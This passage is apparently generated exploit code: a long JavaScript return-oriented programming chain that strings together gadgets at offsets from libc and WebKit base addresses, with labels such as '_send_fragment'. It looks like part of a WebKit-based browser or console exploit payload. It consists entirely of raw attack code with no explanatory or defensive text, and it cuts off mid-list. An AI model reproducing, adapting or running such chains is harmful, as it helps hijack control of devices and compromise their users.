libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12839:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+579392, //L12840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+579424, //L12843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L12840:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12842:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L12843:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+579528, //L12846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+579512, //L12844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12844:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12846:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+579688, //L12850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+579656, //L12848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+579672, //L12849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12847:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L12848:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12849:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12850:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+579744, //L12852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12852:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+579872, //L12854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+579888, //L12855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+579856, //L12853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12853:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12854:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12855:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+580048, //L12859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+580016, //L12857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+580032, //L12858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12856:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L12857:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12858:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12859:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+580152, //L12861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+580136, //L12860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12860:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12861:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12862:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L12863:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+580360, //L12866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+580344, //L12865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12864:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L12865:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12866:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+580464, //L12868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+580448, //L12867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12867:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12868:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+580544, //L12869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12869:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12871:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+580664, //L12874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+580648, //L12872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12872:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12874:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+580824, //L12878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+580792, //L12876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+580808, //L12877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12875:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L12876:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12877:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12878:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+580880, //L12880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+581008, //L12882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+581024, //L12883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+580992, //L12881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12881:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12882:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12883:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+581184, //L12887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+581152, //L12885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+581168, //L12886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12884:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L12885:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12886:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12887:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+581288, //L12889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+581272, //L12888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12888:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12889:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12890:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L12891:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+581488, //L12894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+581472, //L12893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12892:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L12893:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12894:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+581592, //L12896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+581576, //L12895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12895:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12896:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+581704, //L12899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+581688, //L12898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12897:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L12898:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12899:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+581768, //L12901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+763368 //pop rcx
]);
//L12901:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+581824, //L12902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12902:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+581976, //L12905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+581992, //L12906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+581960, //L12904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12904:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12906:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+582152, //L12910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+582120, //L12908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+582136, //L12909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12907:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L12908:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12909:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12910:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+582272, //L12911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+582304, //L12913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+582288, //L12912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12911:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12912:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12913:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+582408, //L12914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+582424, //L12915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12914:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12915:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+582544, //L12916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+582528, //L12917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12917:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+582632, //L12919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+582616, //L12918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12918:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12919:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+582736, //L12920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+582752, //L12921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12920:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12921:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+582872, //L12922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+582856, //L12923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12923:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12922:
db([0, 0]); // 0x0
//_send_fragment:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+582944, //L12925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12925:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+583008, //L12927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8240, 0]); // 0x2030
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+583080, //L12928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12928:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12929:
db([44, 0]); // 0x2c
set_gadget(libc_base+144605,); //pop rdi
//L12930:
db([44, 0]); // 0x2c
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+583272, //L12934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+583240, //L12932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+583256, //L12933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12931:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L12932:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12933:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12934:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+583376, //L12936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+583360, //L12935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12935:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12936:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+583472, //L12938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12937:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L12938:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+583552, //L12940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+583608, //L12941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12941:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12943:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L12944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+583760, //L12946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+583816, //L12947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+583888, //L12950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12950:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+583944, //L12951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12951:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+584032, //L12953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12953:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12954:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12955:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+584224, //L12959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+584192, //L12957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+584208, //L12958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12956:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L12957:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12958:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12959:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+584328, //L12961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+584312, //L12960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12960:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12961:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+584424, //L12963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12962:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L12963:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+584504, //L12965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+584560, //L12966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12968:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L12969:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+584712, //L12971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+584768, //L12972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12972:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+584840, //L12975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+584896, //L12976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12976:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+584984, //L12978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12978:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12979:
db([1, 0]); // 0x1
set_gadget(libc_base+144605,); //pop rdi
//L12980:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+585176, //L12984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+585144, //L12982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+585160, //L12983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12981:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L12982:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12983:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12984:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
